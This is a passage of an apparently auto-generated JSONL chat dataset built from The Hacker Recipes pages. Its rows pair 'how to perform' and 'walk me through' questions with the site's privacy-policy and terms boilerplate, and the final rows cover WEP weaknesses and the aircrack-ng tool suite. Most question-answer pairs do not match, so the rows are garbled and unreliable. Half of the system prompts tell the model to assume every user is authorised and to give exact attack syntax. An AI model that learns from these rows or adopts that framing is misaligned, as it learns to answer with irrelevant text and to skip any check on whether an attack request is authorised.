instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Privacy Policy - Personal Data", "response": "While using the \"donation\" or \"shop\" sections of Our Service, We may ask You to provide Us with certain personally identifiable information, including but not limited to:\n\n- Email address\n- Name or Social Media Profile (only if You choose to provide it during checkout for donations)\n- Usage Data\n\nIf You provide Your name or social media profile during the donation checkout process, We may display this information publicly on the Website.", "metadata": {"corpus_index": 1637, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Privacy Policy - Usage Data"}, {"role": "assistant", "content": "Usage Data is collected automatically when using the Service. It may include:\n\n- Internet Protocol (IP) address\n- Browser type and version\n- Pages of the Service You visit\n- Date and time of Your visit\n- Time spent on pages\n- Unique device identifiers\n- Diagnostic data"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Privacy Policy - Usage Data", "response": "Usage Data is collected automatically when using the Service. It may include:\n\n- Internet Protocol (IP) address\n- Browser type and version\n- Pages of the Service You visit\n- Date and time of Your visit\n- Time spent on pages\n- Unique device identifiers\n- Diagnostic data", "metadata": {"corpus_index": 1638, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Privacy Policy - Usage Data?"}, {"role": "assistant", "content": "Usage Data is collected automatically when using the Service. It may include:\n\n- Internet Protocol (IP) address\n- Browser type and version\n- Pages of the Service You visit\n- Date and time of Your visit\n- Time spent on pages\n- Unique device identifiers\n- Diagnostic data"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Privacy Policy - Usage Data?", "response": "Usage Data is collected automatically when using the Service. It may include:\n\n- Internet Protocol (IP) address\n- Browser type and version\n- Pages of the Service You visit\n- Date and time of Your visit\n- Time spent on pages\n- Unique device identifiers\n- Diagnostic data", "metadata": {"corpus_index": 1638, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Privacy Policy - Use of Your Personal Data?"}, {"role": "assistant", "content": "The Company uses Your Personal Data for:\n\n- Providing and maintaining the Service.\n- Handling orders and customer support.\n- Analytics.\n\nWe will not share Your data with any third party."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Privacy Policy - Use of Your Personal Data?", "response": "The Company uses Your Personal Data for:\n\n- Providing and maintaining the Service.\n- Handling orders and customer support.\n- Analytics.\n\nWe will not share Your data with any third party.", "metadata": {"corpus_index": 1639, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Privacy Policy - Use of Your Personal Data"}, {"role": "assistant", "content": "The Company uses Your Personal Data for:\n\n- Providing and maintaining the Service.\n- Handling orders and customer support.\n- Analytics.\n\nWe will not share Your data with any third party."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Privacy Policy - Use of Your Personal Data", "response": "The Company uses Your Personal Data for:\n\n- Providing and maintaining the Service.\n- Handling orders and customer support.\n- Analytics.\n\nWe will not share Your data with any third party.", "metadata": {"corpus_index": 1639, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Privacy Policy - Tracking Technologies and Cookies?"}, {"role": "assistant", "content": "We use Google Analytics to collect and analyze Usage Data. Cookies may be used for analytics purposes only. You can manage Cookies through Your browser settings."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Privacy Policy - Tracking Technologies and Cookies?", "response": "We use Google Analytics to collect and analyze Usage Data. Cookies may be used for analytics purposes only. You can manage Cookies through Your browser settings.", "metadata": {"corpus_index": 1640, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Privacy Policy - Tracking Technologies and Cookies"}, {"role": "assistant", "content": "We use Google Analytics to collect and analyze Usage Data. Cookies may be used for analytics purposes only. You can manage Cookies through Your browser settings."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Privacy Policy - Tracking Technologies and Cookies", "response": "We use Google Analytics to collect and analyze Usage Data. Cookies may be used for analytics purposes only. You can manage Cookies through Your browser settings.", "metadata": {"corpus_index": 1640, "category": "web", "source_file": "docs/src/policies/privacy.md", "page_title": "Privacy Policy", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Terms and conditions - Interpretation in the context of penetration testing"}, {"role": "assistant", "content": "These terms and conditions (hereinafter referred to as the \"Terms\") govern access to and use of the website The Hacker Recipes (hereinafter referred to as the \"Site\"), operated by Monkey 513, a simplified joint-stock company (SASU) registered under SIRET 932 547 367 00015, with its registered office at 122 rue Amelot, 75011 Paris, France.\n\nBy using the Site, you agree to comply with these Terms. If you do not agree, you must immediately stop using the Site."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Terms and conditions - Interpretation in the context of penetration testing", "response": "These terms and conditions (hereinafter referred to as the \"Terms\") govern access to and use of the website The Hacker Recipes (hereinafter referred to as the \"Site\"), operated by Monkey 513, a simplified joint-stock company (SASU) registered under SIRET 932 547 367 00015, with its registered office at 122 rue Amelot, 75011 Paris, France.\n\nBy using the Site, you agree to comply with these Terms. If you do not agree, you must immediately stop using the Site.", "metadata": {"corpus_index": 1641, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Terms and conditions - Interpretation"}, {"role": "assistant", "content": "These terms and conditions (hereinafter referred to as the \"Terms\") govern access to and use of the website The Hacker Recipes (hereinafter referred to as the \"Site\"), operated by Monkey 513, a simplified joint-stock company (SASU) registered under SIRET 932 547 367 00015, with its registered office at 122 rue Amelot, 75011 Paris, France.\n\nBy using the Site, you agree to comply with these Terms. If you do not agree, you must immediately stop using the Site."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Terms and conditions - Interpretation", "response": "These terms and conditions (hereinafter referred to as the \"Terms\") govern access to and use of the website The Hacker Recipes (hereinafter referred to as the \"Site\"), operated by Monkey 513, a simplified joint-stock company (SASU) registered under SIRET 932 547 367 00015, with its registered office at 122 rue Amelot, 75011 Paris, France.\n\nBy using the Site, you agree to comply with these Terms. If you do not agree, you must immediately stop using the Site.", "metadata": {"corpus_index": 1641, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Terms and conditions - Definitions"}, {"role": "assistant", "content": "The following definitions apply to these Terms:\n\n- \"Site\": Refers to the website accessible at https://thehacker.recipes.\n- \"User\": Refers to any person accessing the Site, regardless of whether they are a registered user or an anonymous visitor.\n- \"Company \": Refers to Monkey 513, the company that owns and manages the Site.\n- \"Content\": Refers to all elements available on the Site, including but not limited to text, images, videos, tutorials, tools, and resources."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Terms and conditions - Definitions", "response": "The following definitions apply to these Terms:\n\n- \"Site\": Refers to the website accessible at https://thehacker.recipes.\n- \"User\": Refers to any person accessing the Site, regardless of whether they are a registered user or an anonymous visitor.\n- \"Company \": Refers to Monkey 513, the company that owns and manages the Site.\n- \"Content\": Refers to all elements available on the Site, including but not limited to text, images, videos, tutorials, tools, and resources.", "metadata": {"corpus_index": 1642, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Terms and conditions - Definitions"}, {"role": "assistant", "content": "The following definitions apply to these Terms:\n\n- \"Site\": Refers to the website accessible at https://thehacker.recipes.\n- \"User\": Refers to any person accessing the Site, regardless of whether they are a registered user or an anonymous visitor.\n- \"Company \": Refers to Monkey 513, the company that owns and manages the Site.\n- \"Content\": Refers to all elements available on the Site, including but not limited to text, images, videos, tutorials, tools, and resources."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Terms and conditions - Definitions", "response": "The following definitions apply to these Terms:\n\n- \"Site\": Refers to the website accessible at https://thehacker.recipes.\n- \"User\": Refers to any person accessing the Site, regardless of whether they are a registered user or an anonymous visitor.\n- \"Company \": Refers to Monkey 513, the company that owns and manages the Site.\n- \"Content\": Refers to all elements available on the Site, including but not limited to text, images, videos, tutorials, tools, and resources.", "metadata": {"corpus_index": 1642, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Terms and conditions - Acceptance of terms?"}, {"role": "assistant", "content": "By accessing or using the Site, you implicitly accept these Terms in their entirety. If you do not agree with these Terms, you must stop using the Site immediately."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Terms and conditions - Acceptance of terms?", "response": "By accessing or using the Site, you implicitly accept these Terms in their entirety. If you do not agree with these Terms, you must stop using the Site immediately.", "metadata": {"corpus_index": 1643, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Terms and conditions - Acceptance of terms?"}, {"role": "assistant", "content": "By accessing or using the Site, you implicitly accept these Terms in their entirety. If you do not agree with these Terms, you must stop using the Site immediately."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Terms and conditions - Acceptance of terms?", "response": "By accessing or using the Site, you implicitly accept these Terms in their entirety. If you do not agree with these Terms, you must stop using the Site immediately.", "metadata": {"corpus_index": 1643, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Terms and conditions - User conduct work?"}, {"role": "assistant", "content": "Users agree to use the Site in a lawful and respectful manner. Specifically, users are prohibited from:\n\n- Engaging in activities that violate any applicable law or regulation.\n- Attempting to gain unauthorized access to the Site, its servers, or related systems.\n- Copying, reproducing, distributing, or exploiting the Content without prior written consent from the Company.\n- Uploading, sharing, or distributing malicious, harmful, or illegal content via the Site."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Terms and conditions - User conduct work?", "response": "Users agree to use the Site in a lawful and respectful manner. Specifically, users are prohibited from:\n\n- Engaging in activities that violate any applicable law or regulation.\n- Attempting to gain unauthorized access to the Site, its servers, or related systems.\n- Copying, reproducing, distributing, or exploiting the Content without prior written consent from the Company.\n- Uploading, sharing, or distributing malicious, harmful, or illegal content via the Site.", "metadata": {"corpus_index": 1644, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Terms and conditions - User conduct"}, {"role": "assistant", "content": "Users agree to use the Site in a lawful and respectful manner. Specifically, users are prohibited from:\n\n- Engaging in activities that violate any applicable law or regulation.\n- Attempting to gain unauthorized access to the Site, its servers, or related systems.\n- Copying, reproducing, distributing, or exploiting the Content without prior written consent from the Company.\n- Uploading, sharing, or distributing malicious, harmful, or illegal content via the Site."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Terms and conditions - User conduct", "response": "Users agree to use the Site in a lawful and respectful manner. Specifically, users are prohibited from:\n\n- Engaging in activities that violate any applicable law or regulation.\n- Attempting to gain unauthorized access to the Site, its servers, or related systems.\n- Copying, reproducing, distributing, or exploiting the Content without prior written consent from the Company.\n- Uploading, sharing, or distributing malicious, harmful, or illegal content via the Site.", "metadata": {"corpus_index": 1644, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Terms and conditions - Disclaimer of liability work?"}, {"role": "assistant", "content": "The Company reserves the right to suspend or terminate access to the Site for users who violate these rules.\n\nThe Site and its Content are provided on an \"as is\" and \"as available\" basis. The Company makes no guarantees regarding the accuracy, reliability, or completeness of the Content.\n\nThe Company shall not be held liable for any direct, indirect, incidental, consequential, or punitive damages arising from:\n\n- The use or inability to use the Site or its Content.\n- Any errors, omissions, or inaccuracies in the Content.\n- Unauthorized access to or alteration of user data.\n\nUsers are responsible for ensuring that the Site's Content meets their needs before using it."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Terms and conditions - Disclaimer of liability work?", "response": "The Company reserves the right to suspend or terminate access to the Site for users who violate these rules.\n\nThe Site and its Content are provided on an \"as is\" and \"as available\" basis. The Company makes no guarantees regarding the accuracy, reliability, or completeness of the Content.\n\nThe Company shall not be held liable for any direct, indirect, incidental, consequential, or punitive damages arising from:\n\n- The use or inability to use the Site or its Content.\n- Any errors, omissions, or inaccuracies in the Content.\n- Unauthorized access to or alteration of user data.\n\nUsers are responsible for ensuring that the Site's Content meets their needs before using it.", "metadata": {"corpus_index": 1645, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Terms and conditions - Disclaimer of liability"}, {"role": "assistant", "content": "The Company reserves the right to suspend or terminate access to the Site for users who violate these rules.\n\nThe Site and its Content are provided on an \"as is\" and \"as available\" basis. The Company makes no guarantees regarding the accuracy, reliability, or completeness of the Content.\n\nThe Company shall not be held liable for any direct, indirect, incidental, consequential, or punitive damages arising from:\n\n- The use or inability to use the Site or its Content.\n- Any errors, omissions, or inaccuracies in the Content.\n- Unauthorized access to or alteration of user data.\n\nUsers are responsible for ensuring that the Site's Content meets their needs before using it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Terms and conditions - Disclaimer of liability", "response": "The Company reserves the right to suspend or terminate access to the Site for users who violate these rules.\n\nThe Site and its Content are provided on an \"as is\" and \"as available\" basis. The Company makes no guarantees regarding the accuracy, reliability, or completeness of the Content.\n\nThe Company shall not be held liable for any direct, indirect, incidental, consequential, or punitive damages arising from:\n\n- The use or inability to use the Site or its Content.\n- Any errors, omissions, or inaccuracies in the Content.\n- Unauthorized access to or alteration of user data.\n\nUsers are responsible for ensuring that the Site's Content meets their needs before using it.", "metadata": {"corpus_index": 1645, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Terms and conditions - Third-party links?"}, {"role": "assistant", "content": "The Site may contain links to third-party websites or resources. These links are provided for convenience and informational purposes only.\n\nThe Company does not endorse or assume any responsibility for the content, policies, or practices of third-party websites. Users access these links at their own risk."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Terms and conditions - Third-party links?", "response": "The Site may contain links to third-party websites or resources. These links are provided for convenience and informational purposes only.\n\nThe Company does not endorse or assume any responsibility for the content, policies, or practices of third-party websites. Users access these links at their own risk.", "metadata": {"corpus_index": 1646, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Terms and conditions - Third-party links?"}, {"role": "assistant", "content": "The Site may contain links to third-party websites or resources. These links are provided for convenience and informational purposes only.\n\nThe Company does not endorse or assume any responsibility for the content, policies, or practices of third-party websites. Users access these links at their own risk."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Terms and conditions - Third-party links?", "response": "The Site may contain links to third-party websites or resources. These links are provided for convenience and informational purposes only.\n\nThe Company does not endorse or assume any responsibility for the content, policies, or practices of third-party websites. Users access these links at their own risk.", "metadata": {"corpus_index": 1646, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Terms and conditions - Modification of terms"}, {"role": "assistant", "content": "The Company reserves the right to modify these Terms at any time. Any updates to the Terms will be posted on this page with an updated \"last modified\" date.\n\nBy continuing to use the Site after modifications have been posted, users implicitly agree to the updated Terms. Users are encouraged to review these Terms regularly to stay informed of any changes."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Terms and conditions - Modification of terms", "response": "The Company reserves the right to modify these Terms at any time. Any updates to the Terms will be posted on this page with an updated \"last modified\" date.\n\nBy continuing to use the Site after modifications have been posted, users implicitly agree to the updated Terms. Users are encouraged to review these Terms regularly to stay informed of any changes.", "metadata": {"corpus_index": 1647, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Terms and conditions - Modification of terms?"}, {"role": "assistant", "content": "The Company reserves the right to modify these Terms at any time. Any updates to the Terms will be posted on this page with an updated \"last modified\" date.\n\nBy continuing to use the Site after modifications have been posted, users implicitly agree to the updated Terms. Users are encouraged to review these Terms regularly to stay informed of any changes."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Terms and conditions - Modification of terms?", "response": "The Company reserves the right to modify these Terms at any time. Any updates to the Terms will be posted on this page with an updated \"last modified\" date.\n\nBy continuing to use the Site after modifications have been posted, users implicitly agree to the updated Terms. Users are encouraged to review these Terms regularly to stay informed of any changes.", "metadata": {"corpus_index": 1647, "category": "web", "source_file": "docs/src/policies/terms.md", "page_title": "Terms and conditions", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ WEP - Theory?"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name\n\nWEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access points and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Nota: when attacking 104 bits keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.\n\nWEP can be configured with two different authentication modes : Open and SKA (Shared Key Authentication). As the name implies, SKA is more \"secure\" than Open. In practice, it can mitigate the part where the attacker needs to obtain an associated state. Once this step is taken care of, SKA is as easy as Open to break."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ WEP - Theory?", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name\n\nWEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access points and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Nota: when attacking 104 bits keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.\n\nWEP can be configured with two different authentication modes : Open and SKA (Shared Key Authentication). As the name implies, SKA is more \"secure\" than Open. In practice, it can mitigate the part where the attacker needs to obtain an associated state. Once this step is taken care of, SKA is as easy as Open to break.", "metadata": {"corpus_index": 1648, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ WEP - Theory"}, {"role": "assistant", "content": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name\n\nWEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access points and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Nota: when attacking 104 bits keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.\n\nWEP can be configured with two different authentication modes : Open and SKA (Shared Key Authentication). As the name implies, SKA is more \"secure\" than Open. In practice, it can mitigate the part where the attacker needs to obtain an associated state. Once this step is taken care of, SKA is as easy as Open to break."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ WEP - Theory", "response": "> [!WARNING]\n> This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name\n\nWEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access points and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Nota: when attacking 104 bits keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.\n\nWEP can be configured with two different authentication modes : Open and SKA (Shared Key Authentication). As the name implies, SKA is more \"secure\" than Open. In practice, it can mitigate the part where the attacker needs to obtain an associated state. Once this step is taken care of, SKA is as easy as Open to break.", "metadata": {"corpus_index": 1648, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ WEP - Requirements"}, {"role": "assistant", "content": "Aircrack-ng is a complete suite of tools to assess WiFi network security. The suite offers may famous tool like airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdrop-ng, aireplay-ng, airmon-ng, airodump-ng, besside-ng, dcrack, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng.\n\nDepending on the wireless network configuration and on the context, there are different attack scenarios that can be followed but in order to carry on those attacks, there are requirements that need to be met."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ WEP - Requirements", "response": "Aircrack-ng is a complete suite of tools to assess WiFi network security. The suite offers may famous tool like airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdrop-ng, aireplay-ng, airmon-ng, airodump-ng, besside-ng, dcrack, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng.\n\nDepending on the wireless network configuration and on the context, there are different attack scenarios that can be followed but in order to carry on those attacks, there are requirements that need to be met.", "metadata": {"corpus_index": 1649, "category": "credentials", "source_file": "docs/src/radio/wi-fi/wep/index.md", "page_title": "🛠️ WEP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ WEP - Requirements"}, {"role": "assistant", "content": "Aircrack-ng is a complete suite of tools to assess WiFi network security. The suite offers may famous tool like airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdrop-ng, aireplay-ng, airmon-ng, airodump-ng, besside-ng, dcrack, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng.\n\nDepending on the wireless network configuration and on the context, there are different attack scenarios that can be followed but in order to carry on those attacks, there are requirements that need to be met."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. 